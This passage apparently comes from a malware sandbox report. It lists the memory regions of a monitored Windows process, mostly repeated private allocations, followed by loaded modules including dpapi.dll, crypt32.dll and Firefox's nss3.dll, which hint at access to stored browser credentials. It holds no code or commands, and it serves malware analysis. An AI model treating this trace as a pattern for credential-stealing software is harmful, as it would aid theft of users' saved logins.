"private_0x00000000001a0000" filename = "" Region: id = 17419 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17420 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17421 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17422 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17423 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17424 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17425 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17426 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17427 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17428 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17429 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17430 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17431 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17432 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17433 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17434 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17435 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17436 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17437 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17438 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17439 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17440 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17441 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17442 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17443 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17444 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17445 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17446 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17447 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17448 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17449 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17450 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17451 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17452 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17453 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17454 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17455 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17456 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17457 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17458 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17459 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17460 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17461 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17462 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17463 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17464 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17465 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17466 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17467 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17468 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17469 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17470 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17471 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17472 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17473 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17474 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17475 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17476 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17477 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17478 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17479 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17480 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17481 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17482 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17483 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17484 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17485 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17486 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17487 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17488 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17489 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17490 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17491 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17492 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17493 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17494 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17495 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17496 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17497 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17498 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17499 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17500 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17501 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17502 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17503 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17504 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17505 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17506 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17507 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17508 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17509 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17510 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17511 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17512 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17513 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17514 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17515 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17516 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17517 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17518 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17519 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17520 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17521 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17522 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17523 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17524 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17525 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17526 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17527 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17528 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17529 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17530 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17531 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17532 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17533 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17534 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17535 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17536 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17537 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17538 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17539 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17540 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17541 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17542 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17543 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17544 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17545 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17546 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17547 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17548 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17549 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17550 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17551 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17552 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17553 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17554 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17555 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17556 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17557 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17558 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17559 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17560 start_va = 0x1a0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 17561 start_va = 0x75480000 end_va = 0x755f7fff monitored = 0 entry_point = 0x754d8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 17562 start_va = 0x746e0000 end_va = 0x746edfff monitored = 0 entry_point = 0x746e5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 17563 start_va = 0x8490000 end_va = 0x84cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008490000" filename = "" Region: id = 17564 start_va = 0x84d0000 end_va = 0x850ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084d0000" filename = "" Region: id = 17565 start_va = 0x70230000 end_va = 0x70237fff monitored = 0 entry_point = 0x70231d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 17566 start_va = 0x75b00000 end_va = 0x75beafff monitored = 0 entry_point = 0x75b3d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 17567 start_va = 0x8510000 end_va = 0x8709fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 17568 start_va = 0x730f0000 end_va = 0x73164fff monitored = 0 entry_point = 0x73129a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 17569 start_va = 0x8710000 end_va = 0x88bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 17571 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 17572 start_va = 0x746f0000 end_va = 0x74773fff monitored = 0 entry_point = 0x74716220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 17573 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 17574 start_va = 0x73420000 end_va = 0x73fb8fff monitored = 0 entry_point = 0x735f6970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 17575 start_va = 0x73fc0000 end_va = 0x7428afff monitored = 0 entry_point = 0x741fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 17576 start_va = 0x88c0000 end_va = 0x8bf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 17577 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 17578 start_va = 0x73210000 end_va = 0x7341efff monitored = 0 entry_point = 0x732bb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 17579 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 17580 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 17581 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 17582 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 17583 start_va = 0x8710000 end_va = 0x874ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 17584 start_va = 0x8750000 end_va = 0x878ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008750000" filename = "" Region: id = 17585 start_va = 0x88b0000 end_va = 0x88bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 17740 start_va = 0x8790000 end_va = 0x87cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008790000" filename = "" Region: id = 17741 start_va = 0x87d0000 end_va = 0x880ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 17742 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 17743 start_va = 0x4d0000 end_va = 0x4d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 17744 start_va = 0x70040000 end_va = 0x70049fff monitored = 0 entry_point = 0x70043200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 17745 start_va = 0x70000000 end_va = 0x70032fff monitored = 0 entry_point = 0x70010e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 17746 start_va = 0x70490000 end_va = 0x705dafff monitored = 0 entry_point = 0x704f1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 17747 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 17749 start_va = 0x4e0000 end_va = 0x4e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 17751 start_va = 0x4e0000 end_va = 0x4e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 17753 start_va = 0x6df90000 end_va = 0x6e12ffff monitored = 0 entry_point = 0x6e08db35 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll") Region: id = 17754 start_va = 0x6df60000 end_va = 0x6df83fff monitored = 0 entry_point = 0x6df64820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 17755 start_va = 0x6ffa0000 end_va = 0x6ffa7fff monitored = 0 entry_point = 0x6ffa1740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 17756 start_va = 0x74e00000 end_va = 0x74e5efff monitored = 0 entry_point = 0x74e04af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 17757 start_va = 0x6de50000 end_va = 0x6de6afff monitored = 0 entry_point = 0x6de5a307 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll") Region: id = 17758 start_va = 0x8810000 end_va = 0x884ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 17759 start_va = 0x8850000 end_va = 0x888ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008850000" filename = "" Region: id = 17760 start_va = 0x6de20000 end_va = 0x6de42fff monitored = 0 entry_point = 0x6de28940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 17761 start_va = 0x6de70000 end_va = 0x6df5dfff monitored = 0 entry_point = 